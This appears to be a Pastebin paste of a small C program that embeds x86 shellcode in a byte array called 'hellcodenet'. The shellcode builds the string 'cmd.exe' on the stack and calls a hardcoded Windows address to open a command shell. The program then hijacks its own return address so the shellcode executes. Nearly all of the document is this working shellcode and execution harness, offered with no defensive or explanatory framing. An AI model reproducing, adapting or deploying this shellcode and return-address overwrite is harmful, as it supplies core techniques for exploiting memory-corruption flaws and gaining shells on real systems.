Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <winbase.h>
- unsigned char hellcodenet[]=
- "\x8b\xec\x55\x8b\xec"
- "\x68\x65\x78\x65\x2F"
- "\x68\x63\x6d\x64\x2e"
- "\x8d\x45\xf8\x50\xb8"
- "\xc7\x93\xc1\x77"
- "\xff\xd0"
- ;
- int main ()
- {
- int *ret;
- ret=(int *)&ret+2;
- (*ret)=(int)hellcodenet;
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment